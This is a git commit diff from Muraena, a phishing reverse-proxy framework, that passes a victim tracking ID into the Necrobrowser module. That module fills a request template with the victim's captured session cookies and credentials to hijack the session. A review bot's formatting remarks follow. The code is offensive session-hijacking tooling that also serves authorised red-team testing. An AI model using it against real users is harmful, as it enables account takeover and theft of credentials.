Pass Tracking ID to Necrobrowser
ohpe committed Nov 24, 2022
1 parent d4b2c73 commit a99c513
Showing 2 changed files with 12 additions and 3 deletions.
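--- a/module/necrobrowser/necrobrowser.go
+++ b/module/necrobrowser/necrobrowser.go
@@ -25,6 +25,7 @@ const (
 Author = "Muraena Team"
 
 // Placeholders for templates
+TrackerPlaceholder = "%%%TRACKER%%%"
 CookiePlaceholder = "%%%COOKIES%%%"
 CredentialsPlaceholder = "%%%CREDENTIALS%%%"
 )
@@ -155,7 +156,7 @@ func (module *Necrobrowser) CheckSessionCookies() {
 
 // if we find the cookies, and the session has not been already instrumented (== false), then instrument
 if cookiesNeeded == cookiesFound && !v.SessionInstrumented {
-module.Instrument(v.Cookies, "[]") // TODO add credentials JSON, instead of passing empty [] array
+module.Instrument(v.ID, v.Cookies, "[]") // TODO add credentials JSON, instead of passing empty [] array
 // prevent the session to be instrumented twice
 _ = db.SetSessionAsInstrumented(v.ID)
 }
@@ -171,7 +172,11 @@ func Contains(slice *[]string, find string) bool {
 return false
 }
 
-func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJSON string) {
+
+
+
+
+func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCookie, credentialsJSON string) {
 
 var necroCookies []SessionCookie
 const timeLayout = "2006-01-02 15:04:05 -0700 MST"
@@ -206,6 +211,7 @@ func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJ
 }
 
 cookiesJSON := string(c)
+module.Request = strings.ReplaceAll(module.Request, TrackerPlaceholder, victimID)
 module.Request = strings.ReplaceAll(module.Request, CookiePlaceholder, cookiesJSON)
 module.Request = strings.ReplaceAll(module.Request, CredentialsPlaceholder, credentialsJSON)
 
@@ -224,3 +230,6 @@ func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJ
 module.Info("NecroBrowser Response: %+v", resp)
 return
 }
+
+
+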
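Review bot: The four blank lines added above `Instrument` and the three appended after its closing brace (apparently at the end of the file) are not gofmt-clean. gofmt would collapse the first run to a single blank line and drop the trailing ones, so they are best left out of the commit. The exported method also changes its signature without a doc comment; a line such as `// Instrument substitutes victimID, the cookie jar and credentialsJSON into the request template's placeholders.` above it would record what the new first argument is for. The body of `Instrument` continues outside the hunks shown, so that wording covers only the substitutions visible here.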
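--- a/module/tracking/tracking.go
+++ b/module/tracking/tracking.go
@@ -510,7 +510,7 @@ func (t *Trace) HijackSession(request *http.Request) (err error) {
 } else {
 nb, ok := m.(*necrobrowser.Necrobrowser)
 if ok {
-go nb.Instrument(victim.Cookies, string(creds))
+go nb.Instrument(victim.ID, victim.Cookies, string(creds))
 }
 }
 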
